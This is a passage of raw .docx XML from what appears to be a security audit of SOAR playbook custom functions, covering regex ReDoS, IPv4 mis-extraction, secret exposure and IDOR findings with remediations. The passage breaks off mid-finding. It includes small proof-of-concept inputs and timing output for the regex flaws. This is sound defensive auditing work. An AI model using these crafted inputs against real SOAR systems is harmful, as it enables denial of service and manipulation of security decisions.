        <w:t>email_regex = r'[a-z0-9.!#$%&amp;\'*+/=?^_`{|}~-]+@[a-z0-9.-]+\.[a-z]{2,}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for email in re.findall(email_regex, input_string, re.IGNORECASE):</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outputs.append({'email_address': email, 'domain': email.split('@')[-1]})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>**Description**: Two problems. (1) The unanchored `+`/`+` quantifiers around `@` exhibit polynomial backtracking on long inputs with no terminating TLD, and the function runs over attacker-controlled To/CC/body text with no length cap. (2) The pattern over-matches: inside a URL it extracts `victim@corp.com.attacker.io` and the derived `domain` (`email.split('@')[-1]`) becomes attacker-controlled (`corp.com.attacker.io`). If downstream logic treats that domain as a trusted recipient/sender, the attacker steers it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>**Untrusted-input reachability**: phishing email headers/body (CEF) → `input_string`. **Exploitable** for DoS (polynomial) and extraction confusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>**Proof of concept**:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$ python3 -I regex_email.py 'see link http://host/?r=victim@corp.com.attacker.io end' -&gt; ['//host/?r=victim@corp.com.attacker.io'] n= 8000 total_len= 16001  1.4294s      # ~4x per 2x input -&gt; polynomial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>**Remediation**: cap input length, anchor with word boundaries, and use a possessive/atomic-free linear pattern; prefer the `email.utils.getaddresses` parser for To/CC fields:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>from email.utils import getaddresses if len(input_string) &gt; 100_000: raise ValueError("input too large") pairs = getaddresses([input_string])          # robust RFC parser for header lists for _, addr in pairs: if '@' in addr: outputs.append({'email_address': addr, 'domain': addr.rsplit('@', 1)[-1]})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`getaddresses` handles `"Name" &lt;a@b.com&gt;, &lt;c@d.com&gt;` correctly and does not backtrack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1333 Inefficient Regular Expression Complexity (ReDoS); CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-400 Uncontrolled Resource Consumption (2024 CWE Top 25 #24). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection, A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-5 Denial-of-Service Protection, SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-11 — asset_get_attributes returns the full asset configuration (possible secret exposure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 4.9). Exploitability: Exposure risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/asset_get_attributes.py:42-44</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The entire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/rest/asset/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> record — including the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block, which for many SOAR apps holds credentials/API keys/tokens — is returned verbatim as the function output. The docstring anticipates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>configuration.&lt;key&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access, but returning the whole object means secrets can land in playbook debug logs, notes, or artifacts if the output is rendered. (No secret is hard-coded here; the risk is run-time propagation.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: not attacker-input-driven; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exposure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> risk depends on how the playbook uses/logs the output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: return only a safe allowlist of non-secret attributes, or redact known-sensitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keys (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>api_key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*_key</w:t>
      </w:r>
      <w:r>
        <w:t>) before returning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control, A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1552 Unsecured Credentials. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-28 Protection of Information at Rest, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.12 Data leakage prevention. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-08 — regex_extract_ipv4: unanchored regex extracts wrong or partial IPs used for security decisions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 4.3). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/regex_extract_ipv4.py:20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ip_rex = re.findall('(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', input_string)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The pattern has no word boundaries/anchors, so it matches *inside* longer numeric tokens and yields an IP different from the real token. Extracted IPs feed block/allow/enrichment actions, so an attacker can cause the SOAR to act on the wrong address (or avoid acting on the intended one). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CEF text → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (correctness/validation). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I regex_ipv4.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'256.1.1.1'    -&gt; ['56.1.1.1']       # a different, valid, attacker-chosen IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'1.2.3.4567'   -&gt; ['1.2.3.45']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'1.2.3.4.5.6'  -&gt; ['1.2.3.4']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: add boundaries and validate with the stdlib:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import re, ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>candidates = re.findall(r'(?&lt;![\w.])((?:\d{1,3}\.){3}\d{1,3})(?![\w.])', input_string)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ips = []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for c in candidates:</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try:</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ips.append(str(ipaddress.IPv4Address(c)))   # rejects 256.1.1.1 etc.</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except ValueError:</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continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Boundaries stop partial matches; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> guarantees each result is a real IPv4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-625. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1027 Obfuscated Files or Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-10 — Object-reference inputs acted on without authorisation checks (artifact/indicator/evidence functions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 4.3). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/artifact_update.py:42,47-50,106; artifact_create.py:93; indicator_tag.py:40,53; mark_evidence.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: IDs are type-coerced but not ownership-checked, so a function invoked with an attacker-influenced id operates on an arbitrary object the automation user can reach. Int-validation and the platform's own RBAC bound the impact, so this is defense-in-depth rather than a direct break. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only if a playbook maps attacker data into an id field. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: n/a (requires live REST). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: validate that the referenced object belongs to the current container/case before mutating; avoid accepting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact_id</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside free-form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_json</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-639 Authorization Bypass Through User-Controlled Key (IDOR); CWE-284 Improper Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1565 Data Manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.3 Information access restriction. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-14 — url_parse: unhandled ValueError on malformed port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.7). Exploitability: Exploitable as nuisance DoS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/url_parse.py:26-37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>urllib.parse</w:t>
      </w:r>
      <w:r>
